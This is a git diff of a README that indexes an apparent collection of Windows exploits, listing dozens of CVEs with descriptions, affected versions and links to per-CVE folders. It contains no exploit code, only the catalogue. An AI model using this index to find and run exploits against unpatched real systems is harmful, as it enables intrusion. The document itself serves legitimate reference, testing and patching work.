+| [CVE-2020-16938](./CVE-2020-16938)             |            Windows Kernel Information Disclosure             |                  Windows Server                  |
+| [CVE-2020-16898](./CVE-2020-16898)             |             Windows TCP/IP Remote Code Execution             |              Windows 10/2019/Server              |
+| [CVE-2020-1337](./CVE-2020-1337)               |               Windows Print Spooler Elevation                |   Windows 7/8.1/10/2008/2012/2016/2019/Server    |
+| [CVE-2020-1313](./CVE-2020-1313)               |        Windows Update Orchestrator Service Elevation         |                Windows 10/Server                 |
+| [CVE-2020-1066](./CVE-2020-1066)               |                   .NET Framework Elevation                   |                  Windows 7/2008                  |
+| [CVE-2020-1015](./CVE-2020-1015)               |                Windows Elevation of Privilege                |   Windows 7/8.1/10/2008/2012/2016/2019/Server    |
+| [CVE-2020-1054](./CVE-2020-1054)               |                Win32k Elevation of Privilege                 |   Windows 7/8.1/10/2008/2012/2016/2019/Server    |
+| [CVE-2020-1472](./CVE-2020-1472)               |               Netlogon Elevation of Privilege                |        Windows 2008/2012/2016/2019/Server        |
+| [CVE-2020-0668](./CVE-2020-0668)               |            Windows Kernel Elevation of Privilege             |    Windows 7/8.1/10/2008/2012/2016/2019/Serve    |
+| [CVE-2020-0683](./CVE-2020-0683)               |           Windows Installer Elevation of Privilege           |   Windows 7/8.1/10/2008/2012/2016/2019/Server    |
+| [CVE-2020-0796](./CVE-2020-0796)               |                 SMBv3 Remote Code Execution                  |                  Windows Server                  |
+| [CVE-2020-0787](./CVE-2020-0787)               |       Windows Background Intelligent Transfer Service        |        Windows 7/8/10/2008/2012/2016/2019        |
+| [CVE-2019-0808](.CVE-2019-0808)                |                Win32k Elevation of Privilege                 |                  Windows 7/2008                  |
+| [CVE-2019-0623](.CVE-2019-0808)                |                Win32k Elevation of Privilege                 |      Windows 7/8.1/10/2008/2012/2016/Serve       |
+| [CVE-2019-1458](./CVE-2019-1458)               |                Win32k Elevation of Privilege                 |          Windows 7/8/10/2008/2012/2016           |
+| [CVE-2019-1388](./CVE-2019-1388)               |      Windows Certificate Dialog Elevation of Privilege       |         Windows 7/8/2008/2012/2016/2019          |
+| [CVE-2019-0859](./TestFailure/)                |                Win32k Elevation of Privilege                 |        Windows 7/8/10/2008/2012/2016/2019        |
+| [CVE-2019-0803](./CVE-2019-0803)               |                Win32k Elevation of Privilege                 |        Windows 7/8/10/2008/2012/2016/2019        |
+| [CVE-2018-8639](./CVE-2018-8639)               |                Win32k Elevation of Privilege                 |        Windows 7/8/10/2008/2012/2016/2019        |
+| [CVE-2018-8453](./CVE-2018-8453)               |                Win32k Elevation of Privilege                 |        Windows 7/8/10/2008/2012/2016/2019        |
+| [CVE-2018-8440](./TestFailure/CVE-2018-8440)   |             Windows ALPC Elevation of Privilege              |          Windows 7/8/10/2008/2012/2016           |
+| [CVE-2018-8120](./CVE-2018-8120)               |                Win32k Elevation of Privilege                 |                  Windows 7/2008                  |
+| [CVE-2018-1038](./TestFailure/CVE-2018-1038)   |            Windows Kernel Elevation of Privilege             |                  Windows 7/2008                  |
+| [CVE-2018-0743](./TestFailure/CVE-2018-0743)   |      Windows Subsystem for Linux Elevation of Privilege      |                 Windows 10/2016                  |
+| [CVE-2018-0833](./CVE-2018-0833)               |       SMBv3 Null Pointer Dereference Denial of Service       |                  Windows 8/2012                  |
+| [CVE-2017-8464](./CVE-2017-8464)               |                  LNK Remote Code Execution                   |          Windows 7/8/10/2008/2012/2016           |
+| [CVE-2017-0213](./CVE-2017-0213)               |              Windows COM Elevation of Privilege              |          Windows 7/8/10/2008/2012/2016           |
+| [CVE-2017-0143](./CVE-2017-0143)               |                 Windows Kernel Mode Drivers                  |       Windows 7/8/10/2008/2012/2016/Vista        |
+| [CVE-2017-0101](./CVE-2017-0101)               |        GDI Palette Objects Local Privilege Escalation        |          Windows 7/8/10/2008/2012/Vista          |
+| [CVE-2016-7255](./CVE-2016-7255)               |                 Windows Kernel Mode Drivers                  |       Windows 7/8/10/2008/2012/2016/Vista        |
+| [CVE-2016-3371](./CVE-2016-3371)               |            Windows Kernel Elevation of Privilege             |          Windows 7/8/10/2008/2012/Vista          |
+| [CVE-2016-3309](./TestFailure/CVE-2016-3309)   |                Win32k Elevation of Privilege                 |          Windows 7/8/10/2008/2012/Vista          |
+| [CVE-2016-3225](./CVE-2016-3225)               |          Windows SMB Server Elevation of Privilege           |          Windows 7/8/10/2008/2012/Vista          |
+| [CVE-2016-0099](./CVE-2016-0099)               |                    Secondary Logon Handle                    |          Windows 7/8/10/2008/2012/Vista          |
+| [CVE-2016-0095](./CVE-2016-0095)               |                Win32k Elevation of Privilege                 |          Windows 7/8/10/2008/2012/Vista          |
+| [CVE-2016-0051](./CVE-2016-0051)               |                WebDAV Elevation of Privilege                 |          Windows 7/8/10/2008/2012/Vista          |
+| [CVE-2016-0041](./CVE-2016-0041)               |       Win32k Memory Corruption Elevation of Privilege        |          Windows 7/8/10/2008/2012/Vista          |
+| [CVE-2015-2546](./CVE-2015-2546)               |       Win32k Memory Corruption Elevation of Privilege        |          Windows 7/8/10/2008/2012/Vista          |
+| [CVE-2015-2387](./CVE-2015-2387)               |                 ATMFD.DLL Memory Corruption                  |       Windows 7/8/2003/2008/2012/Vista/Rt        |
+| [CVE-2015-2370](./CVE-2015-2370)               |              Windows RPC Elevation of Privilege              |       Windows 7/8/10/2003/2008/2012/Vista        |
+| [CVE-2015-1725](./TestFailure/CVE-2015-1725)   |                Win32k Elevation of Privilege                 |       Windows 7/8/10/2003/2008/2012/Vista        |
+| [CVE-2015-1701](./CVE-2015-1701)               |                 Windows Kernel Mode Drivers                  |            Windows 7/2003/2008/Vista             |
+| [CVE-2015-0062](./TestFailure/CVE-2015-0062)   |        Windows Create Process Elevation of Privilege         |              Windows 7/8/2008/2012               |
+| [CVE-2015-0057](./CVE-2015-0057)               |                Win32k Elevation of Privilege                 |         Windows 7/8/2003/2008/2012/Vista         |
+| [CVE-2015-0003](./CVE-2015-0003)               |                Win32k Elevation of Privilege                 |         Windows 7/8/2003/2008/2012/Vista         |
+| [CVE-2015-0002](./TestFailure/CVE-2015-0002)   | Microsoft Application Compatibility Infrastructure Elevation of Privilege |            Windows 7/8/2003/2008/2012            |
+| [CVE-2014-6324](./TestFailure/CVE-2014-6324)   |               Kerberos Checksum Vulnerability                |         Windows 7/8/2003/2008/2012/Vista         |
+| [CVE-2014-6321](./TestFailure/CVE-2014-6321)   |           Microsoft Schannel Remote Code Execution           |         Windows 7/8/2003/2008/2012/Vista         |
+| [CVE-2014-4113](./CVE-2014-4113)               |              Win32k.sys Elevation of Privilege               |         Windows 7/8/2003/2008/2012/Vista         |
+| [CVE-2014-4076](./CVE-2014-4076)               |                TCP/IP Elevation of Privilege                 |                   Windows 2003                   |
+| [CVE-2014-1767](./CVE-2014-1767)               |       Ancillary Function Driver Elevation of Privilege       |         Windows 7/8/2003/2008/2012/Vista         |
+| [CVE-2013-5065](./TestFailure/CVE-2013-5065)   |                         NDProxy.sys                          |                 Windows XP/2003                  |
+| [CVE-2013-1345](./CVE-2013-1345)               |                        Kernel Driver                         |      Windows 7/8/2003/2008/2012/Vista/Rt/Xp      |
+| [CVE-2013-1332](./CVE-2013-1332)               |        DirectX Graphics Kernel Subsystem Double Fetch        |       Windows 7/8/2003/2008/2012/Vista/Rt        |
+| [CVE-2013-0008](./TestFailure/CVE-2013-0008)   |               Win32k Improper Message Handling               |          Windows 7/8/2008/2012/Vista/Rt          |
+| [CVE-2012-0217](./CVE-2012-0217)               |                         Service Bus                          |              Windows 7/2003/2008/Xp              |
+| [CVE-2012-0002](./TestFailure/CVE-2012-0002)   |                   Remote Desktop Protocol                    |           Windows 7/2003/2008/Vista/Xp           |
+| [CVE-2011-2005](./CVE-2011-2005)               |       Ancillary Function Driver Elevation of Privilege       |                 Windows 2003/Xp                  |
+| [CVE-2011-1974](./CVE-2011-1974)               |               NDISTAPI Elevation of Privilege                |                 Windows 2003/Xp                  |
+| [CVE-2011-1249](./CVE-2011-1249)               |       Ancillary Function Driver Elevation of Privilege       |           Windows 7/2003/2008/Vista/Xp           |
+| [CVE-2011-0045](./TestFailure/CVE-2011-0045)   |              Windows Kernel Integer Truncation               |                    Windows Xp                    |
+| [CVE-2010-4398](./CVE-2010-4398)               |       Driver Improper Interaction with Windows Kernel        |           Windows 7/2003/2008/Vista/Xp           |
+| [CVE-2010-3338](./CVE-2010-3338)               |                        Task Scheduler                        |               Windows 7/2008/Vista               |
+| [CVE-2010-2554](./TestFailure/CVE-2010-2554)   |                   Tracing Registry Key ACL                   |               Windows 7/2008/Vista               |
+| [CVE-2010-1897](./CVE-2010-1897)               |                    Win32k Window Creation                    |           Windows 7/2003/2008/Vista/Xp           |
+| [CVE-2010-0270](./CVE-2010-0270)               |                    SMB Client Transaction                    |                  Windows 7/2008                  |
+| [CVE-2010-0233](./CVE-2010-0233)               |                  Windows Kernel Double Free                  |         Windows 2000/2003/2008/Vista/Xp          |
+| [CVE-2010-0020](./TestFailure/CVE-2010-0020)   |                    SMB Pathname Overflow                     |        Windows 7/2000/2003/2008/Vista/Xp         |
+| [CVE-2009-2532](./CVE-2009-2532)               |                     SMBv2 Command Value                      |                Windows 2008/Vista                |
+| [CVE-2009-0079](./TestFailure/CVE-2009-0079)   |               Windows RPCSS Service Isolation                |                 Windows 2003/Xp                  |
+| [CVE-2008-4250](./CVE-2008-4250)               |                        Server Service                        |            Windows 2000/2003/Vista/Xp            |
+| [CVE-2008-4037](./CVE-2008-4037)               |                  SMB Credential Reflection                   |         Windows 2000/2003/2008/Vista/Xp          |
+| [CVE-2008-3464](./CVE-2008-3464)               |                     AFD Kernel Overwrite                     |                 Windows 2003/Xp                  |
+| [CVE-2008-1084](./CVE-2008-1084)               |                          Win32.sys                           |         Windows 2000/2003/2008/Vista/Xp          |
+| [CVE-2006-3439](./CVE-2006-3439)               |                    Remote Code Execution                     |               Windows 2000/2003/Xp               |
+| [CVE-2005-1983](./TestFailure/CVE-2005-1983)   |                         PnP Service                          |                 Windows 2000/Xp                  |
+| [CVE-2003-0352](./CVE-2003-0352)               |               Buffer Overrun In RPC Interface                |             Windows 2000/2003/Xp/Nt              |
 
 
 
diff --git a/README.md b/README.md
index 3182bac..b6d5e77 100644
--- a/README.md
+++ b/README.md
@@ -28,91 +28,92 @@ In the project, the lack of ordinary order documentation, if English is good, fr
 > Numbered list
 
 
-| SecurityBulletin                               |                         Description                          |               OperatingSystem               |
-| :--------------------------------------------- | :----------------------------------------------------------: | :-----------------------------------------: |
-| [CVE-2021-36934](./CVE-2021-36934)             |                      Windows Elevation                       |                 Windows 10                  |
-| [CVE-2021-33739](./CVE-2021-33739)             |             Microsoft DWM Core Library Elevation             |              Windows 10/Server              |
-| [CVE-2021-26868](./CVE-2021-33739)             |             Windows Graphics Component Elevation             |    Windows 8.1/10/2012/2016/2019/Server     |
-| [CVE-2021-1732](./CVE-2021-1732)               |                        Windows Win32k                        |           Windows 10/2019/Server            |
-| [CVE-2021-1709](./TestFailure/CVE-2021-1709)   |                        Windows Win32k                        | Windows 7/8.1/10/2008/2012/2016/2019/Server |
-| [CVE-2020-17087](./TestFailure/CVE-2020-17087) |         Windows Kernel Local Elevation of Privilege          | Windows 7/8.1/10/2008/2012/2016/2019/Server |
-| [CVE-2020-16938](./CVE-2020-16938)             |            Windows Kernel Information Disclosure             |               Windows Server                |
-| [CVE-2020-16898](./CVE-2020-16898)             |             Windows TCP/IP Remote Code Execution             |           Windows 10/2019/Server            |
-| [CVE-2020-1337](./CVE-2020-1337)               |               Windows Print Spooler Elevation                | Windows 7/8.1/10/2008/2012/2016/2019/Server |
-| [CVE-2020-1313](./CVE-2020-1313)               |        Windows Update Orchestrator Service Elevation         |              Windows 10/Server              |
-| [CVE-2020-1066](./CVE-2020-1066)               |                   .NET Framework Elevation                   |               Windows 7/2008                |
-| [CVE-2020-1054](./CVE-2020-1054)               |                Win32k Elevation of Privilege                 | Windows 7/8.1/10/2008/2012/2016/2019/Server |
-| [CVE-2020-1472](./CVE-2020-1472)               |               Netlogon Elevation of Privilege                |     Windows 2008/2012/2016/2019/Server      |
-| [CVE-2020-0668](./CVE-2020-0668)               |            Windows Kernel Elevation of Privilege             | Windows 7/8.1/10/2008/2012/2016/2019/Serve  |
-| [CVE-2020-1015](./CVE-2020-1015)               |                Windows Elevation of Privilege                | Windows 7/8.1/10/2008/2012/2016/2019/Server |
-| [CVE-2020-0796](./CVE-2020-0796)               |                 SMBv3 Remote Code Execution                  |               Windows Server                |
-| [CVE-2020-0787](./CVE-2020-0787)               |       Windows Background Intelligent Transfer Service        |     Windows 7/8/10/2008/2012/2016/2019      |
-| [CVE-2019-0808](.CVE-2019-0808)                |                Win32k Elevation of Privilege                 |               Windows 7/2008                |
-| [CVE-2020-0683](./CVE-2020-0683)               |           Windows Installer Elevation of Privilege           | Windows 7/8.1/10/2008/2012/2016/2019/Server |
-| [CVE-2019-0623](.CVE-2019-0808)                |                Win32k Elevation of Privilege                 |    Windows 7/8.1/10/2008/2012/2016/Serve    |
-| [CVE-2019-1458](./CVE-2019-1458)               |                Win32k Elevation of Privilege                 |        Windows 7/8/10/2008/2012/2016        |
-| [CVE-2019-1388](./CVE-2019-1388)               |      Windows Certificate Dialog Elevation of Privilege       |       Windows 7/8/2008/2012/2016/2019       |
-| [CVE-2019-0859](./TestFailure/)                |                Win32k Elevation of Privilege                 |     Windows 7/8/10/2008/2012/2016/2019      |
-| [CVE-2019-0803](./CVE-2019-0803)               |                Win32k Elevation of Privilege                 |     Windows 7/8/10/2008/2012/2016/2019      |
-| [CVE-2018-8639](./CVE-2018-8639)               |                Win32k Elevation of Privilege                 |     Windows 7/8/10/2008/2012/2016/2019      |
-| [CVE-2018-8453](./CVE-2018-8453)               |                Win32k Elevation of Privilege                 |     Windows 7/8/10/2008/2012/2016/2019      |
-| [CVE-2018-8440](./TestFailure/CVE-2018-8440)   |             Windows ALPC Elevation of Privilege              |        Windows 7/8/10/2008/2012/2016        |
-| [CVE-2018-8120](./CVE-2018-8120)               |                Win32k Elevation of Privilege                 |               Windows 7/2008                |
-| [CVE-2018-1038](./TestFailure/CVE-2018-1038)   |            Windows Kernel Elevation of Privilege             |               Windows 7/2008                |
-| [CVE-2018-0743](./TestFailure/CVE-2018-0743)   |      Windows Subsystem for Linux Elevation of Privilege      |               Windows 10/2016               |
-| [CVE-2018-0833](./CVE-2018-0833)               |       SMBv3 Null Pointer Dereference Denial of Service       |               Windows 8/2012                |
-| [CVE-2017-8464](./CVE-2017-8464)               |                  LNK Remote Code Execution                   |        Windows 7/8/10/2008/2012/2016        |
-| [CVE-2017-0213](./CVE-2017-0213)               |              Windows COM Elevation of Privilege              |        Windows 7/8/10/2008/2012/2016        |
-| [CVE-2017-0143](./CVE-2017-0143)               |                 Windows Kernel Mode Drivers                  |     Windows 7/8/10/2008/2012/2016/Vista     |
-| [CVE-2017-0101](./CVE-2017-0101)               |        GDI Palette Objects Local Privilege Escalation        |       Windows 7/8/10/2008/2012/Vista        |
-| [CVE-2016-7255](./CVE-2016-7255)               |                 Windows Kernel Mode Drivers                  |     Windows 7/8/10/2008/2012/2016/Vista     |
-| [CVE-2016-3371](./CVE-2016-3371)               |            Windows Kernel Elevation of Privilege             |       Windows 7/8/10/2008/2012/Vista        |
-| [CVE-2016-3309](./TestFailure/CVE-2016-3309)   |                Win32k Elevation of Privilege                 |       Windows 7/8/10/2008/2012/Vista        |
-| [CVE-2016-3225](./CVE-2016-3225)               |          Windows SMB Server Elevation of Privilege           |       Windows 7/8/10/2008/2012/Vista        |
-| [CVE-2016-0099](./CVE-2016-0099)               |                    Secondary Logon Handle                    |       Windows 7/8/10/2008/2012/Vista        |
-| [CVE-2016-0095](./CVE-2016-0095)               |                Win32k Elevation of Privilege                 |       Windows 7/8/10/2008/2012/Vista        |
-| [CVE-2016-0051](./CVE-2016-0051)               |                WebDAV Elevation of Privilege                 |       Windows 7/8/10/2008/2012/Vista        |
-| [CVE-2016-0041](./CVE-2016-0041)               |       Win32k Memory Corruption Elevation of Privilege        |       Windows 7/8/10/2008/2012/Vista        |
-| [CVE-2015-2546](./CVE-2015-2546)               |       Win32k Memory Corruption Elevation of Privilege        |       Windows 7/8/10/2008/2012/Vista        |
-| [CVE-2015-2387](./CVE-2015-2387)               |                 ATMFD.DLL Memory Corruption                  |     Windows 7/8/2003/2008/2012/Vista/Rt     |
-| [CVE-2015-2370](./CVE-2015-2370)               |              Windows RPC Elevation of Privilege              |     Windows 7/8/10/2003/2008/2012/Vista     |
-| [CVE-2015-1725](./TestFailure/CVE-2015-1725)   |                Win32k Elevation of Privilege                 |     Windows 7/8/10/2003/2008/2012/Vista     |
-| [CVE-2015-1701](./CVE-2015-1701)               |                 Windows Kernel Mode Drivers                  |          Windows 7/2003/2008/Vista          |
-| [CVE-2015-0062](./TestFailure/CVE-2015-0062)   |        Windows Create Process Elevation of Privilege         |            Windows 7/8/2008/2012            |
-| [CVE-2015-0057](./CVE-2015-0057)               |                Win32k Elevation of Privilege                 |      Windows 7/8/2003/2008/2012/Vista       |
-| [CVE-2015-0003](./CVE-2015-0003)               |                Win32k Elevation of Privilege                 |      Windows 7/8/2003/2008/2012/Vista       |
-| [CVE-2015-0002](./TestFailure/CVE-2015-0002)   | Microsoft Application Compatibility Infrastructure Elevation of Privilege |         Windows 7/8/2003/2008/2012          |
-| [CVE-2014-6324](./TestFailure/CVE-2014-6324)   |               Kerberos Checksum Vulnerability                |      Windows 7/8/2003/2008/2012/Vista       |
-| [CVE-2014-6321](./TestFailure/CVE-2014-6321)   |           Microsoft Schannel Remote Code Execution           |      Windows 7/8/2003/2008/2012/Vista       |
-| [CVE-2014-4113](./CVE-2014-4113)               |              Win32k.sys Elevation of Privilege               |      Windows 7/8/2003/2008/2012/Vista       |
-| [CVE-2014-4076](./CVE-2014-4076)               |                TCP/IP Elevation of Privilege                 |                Windows 2003                 |
-| [CVE-2014-1767](./CVE-2014-1767)               |       Ancillary Function Driver Elevation of Privilege       |      Windows 7/8/2003/2008/2012/Vista       |
-| [CVE-2013-5065](./TestFailure/CVE-2013-5065)   |                         NDProxy.sys                          |               Windows XP/2003               |
-| [CVE-2013-1345](./CVE-2013-1345)               |                        Kernel Driver                         |   Windows 7/8/2003/2008/2012/Vista/Rt/Xp    |
-| [CVE-2013-1332](./CVE-2013-1332)               |        DirectX Graphics Kernel Subsystem Double Fetch        |     Windows 7/8/2003/2008/2012/Vista/Rt     |
-| [CVE-2013-0008](./TestFailure/CVE-2013-0008)   |               Win32k Improper Message Handling               |       Windows 7/8/2008/2012/Vista/Rt        |
-| [CVE-2012-0217](./CVE-2012-0217)               |                         Service Bus                          |           Windows 7/2003/2008/Xp            |
-| [CVE-2012-0002](./TestFailure/CVE-2012-0002)   |                   Remote Desktop Protocol                    |        Windows 7/2003/2008/Vista/Xp         |
-| [CVE-2011-2005](./CVE-2011-2005)               |       Ancillary Function Driver Elevation of Privilege       |               Windows 2003/Xp               |
-| [CVE-2011-1974](./CVE-2011-1974)               |               NDISTAPI Elevation of Privilege                |               Windows 2003/Xp               |
-| [CVE-2011-1249](./CVE-2011-1249)               |       Ancillary Function Driver Elevation of Privilege       |        Windows 7/2003/2008/Vista/Xp         |
-| [CVE-2011-0045](./TestFailure/CVE-2011-0045)   |              Windows Kernel Integer Truncation               |                 Windows Xp                  |
-| [CVE-2010-4398](./CVE-2010-4398)               |       Driver Improper Interaction with Windows Kernel        |        Windows 7/2003/2008/Vista/Xp         |
-| [CVE-2010-3338](./CVE-2010-3338)               |                        Task Scheduler                        |            Windows 7/2008/Vista             |
-| [CVE-2010-2554](./TestFailure/CVE-2010-2554)   |                   Tracing Registry Key ACL                   |            Windows 7/2008/Vista             |
-| [CVE-2010-1897](./CVE-2010-1897)               |                    Win32k Window Creation                    |        Windows 7/2003/2008/Vista/Xp         |
-| [CVE-2010-0270](./CVE-2010-0270)               |                    SMB Client Transaction                    |               Windows 7/2008                |
-| [CVE-2010-0233](./CVE-2010-0233)               |                  Windows Kernel Double Free                  |       Windows 2000/2003/2008/Vista/Xp       |
-| [CVE-2010-0020](./TestFailure/CVE-2010-0020)   |                    SMB Pathname Overflow                     |      Windows 7/2000/2003/2008/Vista/Xp      |
-| [CVE-2009-2532](./CVE-2009-2532)               |                     SMBv2 Command Value                      |             Windows 2008/Vista              |
-| [CVE-2009-0079](./TestFailure/CVE-2009-0079)   |               Windows RPCSS Service Isolation                |               Windows 2003/Xp               |
-| [CVE-2008-4250](./CVE-2008-4250)               |                        Server Service                        |         Windows 2000/2003/Vista/Xp          |
-| [CVE-2008-4037](./CVE-2008-4037)               |                  SMB Credential Reflection                   |       Windows 2000/2003/2008/Vista/Xp       |
-| [CVE-2008-3464](./CVE-2008-3464)               |                     AFD Kernel Overwrite                     |               Windows 2003/Xp               |
-| [CVE-2008-1084](./CVE-2008-1084)               |                          Win32.sys                           |       Windows 2000/2003/2008/Vista/Xp       |
-| [CVE-2006-3439](./CVE-2006-3439)               |                    Remote Code Execution                     |            Windows 2000/2003/Xp             |
-| [CVE-2005-1983](./TestFailure/CVE-2005-1983)   |                         PnP Service                          |               Windows 2000/Xp               |
-| [CVE-2003-0352](./CVE-2003-0352)               |               Buffer Overrun In RPC Interface                |           Windows 2000/2003/Xp/Nt           |
+| SecurityBulletin                               |                         Description                          |                 OperatingSystem                  |
+| :--------------------------------------------- | :----------------------------------------------------------: | :----------------------------------------------: |
+| [CVE-2021-40444](./CVE-2021-40444)             |                        Windows IE RCE                        | Windows 7/8.1/10/2008/2012/2016/2019/2022/Server |
+| [CVE-2021-36934](./CVE-2021-36934)             |                      Windows Elevation                       |                    Windows 10                    |
+| [CVE-2021-33739](./CVE-2021-33739)             |             Microsoft DWM Core Library Elevation             |                Windows 10/Server                 |
+| [CVE-2021-26868](./CVE-2021-33739)             |             Windows Graphics Component Elevation             |       Windows 8.1/10/2012/2016/2019/Server       |
+| [CVE-2021-1732](./CVE-2021-1732)               |                        Windows Win32k                        |              Windows 10/2019/Server              |
+| [CVE-2021-1709](./TestFailure/CVE-2021-1709)   |                        Windows Win32k                        |   Windows 7/8.1/10/2008/2012/2016/2019/Server    |
+| [CVE-2020-17087](./TestFailure/CVE-2020-17087) |         Windows Kernel Local Elevation of Privilege          |   Windows 7/8.1/10/2008/2012/2016/2019/Server    |
+| [CVE-2020-16938](./CVE-2020-16938)             |            Windows Kernel Information Disclosure             |                  Windows Server                  |
+| [CVE-2020-16898](./CVE-2020-16898)             |             Windows TCP/IP Remote Code Execution             |              Windows 10/2019/Server              |
+| [CVE-2020-1337](./CVE-2020-1337)               |               Windows Print Spooler Elevation                |   Windows 7/8.1/10/2008/2012/2016/2019/Server    |
+| [CVE-2020-1313](./CVE-2020-1313)               |        Windows Update Orchestrator Service Elevation         |                Windows 10/Server                 |
+| [CVE-2020-1066](./CVE-2020-1066)               |                   .NET Framework Elevation                   |                  Windows 7/2008                  |
+| [CVE-2020-1054](./CVE-2020-1054)               |                Win32k Elevation of Privilege                 |   Windows 7/8.1/10/2008/2012/2016/2019/Server    |
+| [CVE-2020-1472](./CVE-2020-1472)               |               Netlogon Elevation of Privilege                |        Windows 2008/2012/2016/2019/Server        |
+| [CVE-2020-0668](./CVE-2020-0668)               |            Windows Kernel Elevation of Privilege             |    Windows 7/8.1/10/2008/2012/2016/2019/Serve    |
+| [CVE-2020-1015](./CVE-2020-1015)               |                Windows Elevation of Privilege                |   Windows 7/8.1/10/2008/2012/2016/2019/Server    |
+| [CVE-2020-0796](./CVE-2020-0796)               |                 SMBv3 Remote Code Execution                  |                  Windows Server                  |
+| [CVE-2020-0787](./CVE-2020-0787)               |       Windows Background Intelligent Transfer Service        |        Windows 7/8/10/2008/2012/2016/2019        |
+| [CVE-2019-0808](.CVE-2019-0808)                |                Win32k Elevation of Privilege                 |                  Windows 7/2008                  |
+| [CVE-2020-0683](./CVE-2020-0683)               |           Windows Installer Elevation of Privilege           |   Windows 7/8.1/10/2008/2012/2016/2019/Server    |
+| [CVE-2019-0623](.CVE-2019-0808)                |                Win32k Elevation of Privilege                 |      Windows 7/8.1/10/2008/2012/2016/Serve       |
+| [CVE-2019-1458](./CVE-2019-1458)               |                Win32k Elevation of Privilege                 |          Windows 7/8/10/2008/2012/2016           |
+| [CVE-2019-1388](./CVE-2019-1388)               |      Windows Certificate Dialog Elevation of Privilege       |         Windows 7/8/2008/2012/2016/2019          |
+| [CVE-2019-0859](./TestFailure/)                |                Win32k Elevation of Privilege                 |        Windows 7/8/10/2008/2012/2016/2019        |
+| [CVE-2019-0803](./CVE-2019-0803)               |                Win32k Elevation of Privilege                 |        Windows 7/8/10/2008/2012/2016/2019        |
+| [CVE-2018-8639](./CVE-2018-8639)               |                Win32k Elevation of Privilege                 |        Windows 7/8/10/2008/2012/2016/2019        |
+| [CVE-2018-8453](./CVE-2018-8453)               |                Win32k Elevation of Privilege                 |        Windows 7/8/10/2008/2012/2016/2019        |
+| [CVE-2018-8440](./TestFailure/CVE-2018-8440)   |             Windows ALPC Elevation of Privilege              |          Windows 7/8/10/2008/2012/2016           |
+| [CVE-2018-8120](./CVE-2018-8120)               |                Win32k Elevation of Privilege                 |                  Windows 7/2008                  |
+| [CVE-2018-1038](./TestFailure/CVE-2018-1038)   |            Windows Kernel Elevation of Privilege             |                  Windows 7/2008                  |
+| [CVE-2018-0743](./TestFailure/CVE-2018-0743)   |      Windows Subsystem for Linux Elevation of Privilege      |                 Windows 10/2016                  |
+| [CVE-2018-0833](./CVE-2018-0833)               |       SMBv3 Null Pointer Dereference Denial of Service       |                  Windows 8/2012                  |
+| [CVE-2017-8464](./CVE-2017-8464)               |                  LNK Remote Code Execution                   |          Windows 7/8/10/2008/2012/2016           |
+| [CVE-2017-0213](./CVE-2017-0213)               |              Windows COM Elevation of Privilege              |          Windows 7/8/10/2008/2012/2016           |
+| [CVE-2017-0143](./CVE-2017-0143)               |                 Windows Kernel Mode Drivers                  |       Windows 7/8/10/2008/2012/2016/Vista        |
+| [CVE-2017-0101](./CVE-2017-0101)               |        GDI Palette Objects Local Privilege Escalation        |          Windows 7/8/10/2008/2012/Vista          |
+| [CVE-2016-7255](./CVE-2016-7255)               |                 Windows Kernel Mode Drivers                  |       Windows 7/8/10/2008/2012/2016/Vista        |
+| [CVE-2016-3371](./CVE-2016-3371)               |            Windows Kernel Elevation of Privilege             |          Windows 7/8/10/2008/2012/Vista          |
+| [CVE-2016-3309](./TestFailure/CVE-2016-3309)   |                Win32k Elevation of Privilege                 |          Windows 7/8/10/2008/2012/Vista          |
+| [CVE-2016-3225](./CVE-2016-3225)               |          Windows SMB Server Elevation of Privilege           |          Windows 7/8/10/2008/2012/Vista          |
+| [CVE-2016-0099](./CVE-2016-0099)               |                    Secondary Logon Handle                    |          Windows 7/8/10/2008/2012/Vista          |
+| [CVE-2016-0095](./CVE-2016-0095)               |                Win32k Elevation of Privilege                 |          Windows 7/8/10/2008/2012/Vista          |
+| [CVE-2016-0051](./CVE-2016-0051)               |                WebDAV Elevation of Privilege                 |          Windows 7/8/10/2008/2012/Vista          |
+| [CVE-2016-0041](./CVE-2016-0041)               |       Win32k Memory Corruption Elevation of Privilege        |          Windows 7/8/10/2008/2012/Vista          |
+| [CVE-2015-2546](./CVE-2015-2546)               |       Win32k Memory Corruption Elevation of Privilege        |          Windows 7/8/10/2008/2012/Vista          |
+| [CVE-2015-2387](./CVE-2015-2387)               |                 ATMFD.DLL Memory Corruption                  |       Windows 7/8/2003/2008/2012/Vista/Rt        |
+| [CVE-2015-2370](./CVE-2015-2370)               |              Windows RPC Elevation of Privilege              |       Windows 7/8/10/2003/2008/2012/Vista        |
+| [CVE-2015-1725](./TestFailure/CVE-2015-1725)   |                Win32k Elevation of Privilege                 |       Windows 7/8/10/2003/2008/2012/Vista        |
+| [CVE-2015-1701](./CVE-2015-1701)               |                 Windows Kernel Mode Drivers                  |            Windows 7/2003/2008/Vista             |
+| [CVE-2015-0062](./TestFailure/CVE-2015-0062)   |        Windows Create Process Elevation of Privilege         |              Windows 7/8/2008/2012               |
+| [CVE-2015-0057](./CVE-2015-0057)               |                Win32k Elevation of Privilege                 |         Windows 7/8/2003/2008/2012/Vista         |
+| [CVE-2015-0003](./CVE-2015-0003)               |                Win32k Elevation of Privilege                 |         Windows 7/8/2003/2008/2012/Vista         |
+| [CVE-2015-0002](./TestFailure/CVE-2015-0002)   | Microsoft Application Compatibility Infrastructure Elevation of Privilege |            Windows 7/8/2003/2008/2012            |
+| [CVE-2014-6324](./TestFailure/CVE-2014-6324)   |               Kerberos Checksum Vulnerability                |         Windows 7/8/2003/2008/2012/Vista         |
+| [CVE-2014-6321](./TestFailure/CVE-2014-6321)   |           Microsoft Schannel Remote Code Execution           |         Windows 7/8/2003/2008/2012/Vista         |
+| [CVE-2014-4113](./CVE-2014-4113)               |              Win32k.sys Elevation of Privilege               |         Windows 7/8/2003/2008/2012/Vista         |
+| [CVE-2014-4076](./CVE-2014-4076)               |                TCP/IP Elevation of Privilege                 |                   Windows 2003                   |
+| [CVE-2014-1767](./CVE-2014-1767)               |       Ancillary Function Driver Elevation of Privilege       |         Windows 7/8/2003/2008/2012/Vista         |
+| [CVE-2013-5065](./TestFailure/CVE-2013-5065)   |                         NDProxy.sys                          |                 Windows XP/2003                  |
+| [CVE-2013-1345](./CVE-2013-1345)               |                        Kernel Driver                         |      Windows 7/8/2003/2008/2012/Vista/Rt/Xp      |
+| [CVE-2013-1332](./CVE-2013-1332)               |        DirectX Graphics Kernel Subsystem Double Fetch        |       Windows 7/8/2003/2008/2012/Vista/Rt        |
+| [CVE-2013-0008](./TestFailure/CVE-2013-0008)   |               Win32k Improper Message Handling               |          Windows 7/8/2008/2012/Vista/Rt          |
